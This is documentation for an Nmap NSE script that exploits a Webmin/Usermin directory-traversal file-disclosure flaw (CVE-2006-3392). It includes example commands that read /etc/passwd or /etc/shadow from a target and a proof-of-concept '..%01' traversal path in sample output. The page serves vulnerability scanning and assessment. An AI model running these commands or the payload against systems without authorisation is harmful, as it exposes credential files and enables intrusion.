Script `http-vuln-cve2006-3392`

Script types: portrule
Categories: exploit, vuln, intrusive
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2006-3392.nse

Script Summary

Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)

Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences to bypass the removal of "../" directory traversal sequences.

Script Arguments

http-vuln-cve2006-3392.file: <FILE>. Default: /etc/passwd
slaxml.debug: See the documentation for the slaxml library.
http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent: See the documentation for the http library.
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername: See the documentation for the smbauth library.
vulns.short, vulns.showall: See the documentation for the vulns library.

Example Usage

nmap -sV --script http-vuln-cve2006-3392 <target>
nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow <target>

Script Output

PORT   STATE SERVICE REASON
10000/tcp open  webmin    syn-ack
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|     Description:
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|     Disclosure date: 2006
|     Extra information:
|       Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd
|     References:
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_      http://www.exploit-db.com/exploits/1997/

Requires

Author:

Paul AMAR <aos.paul@gmail.com>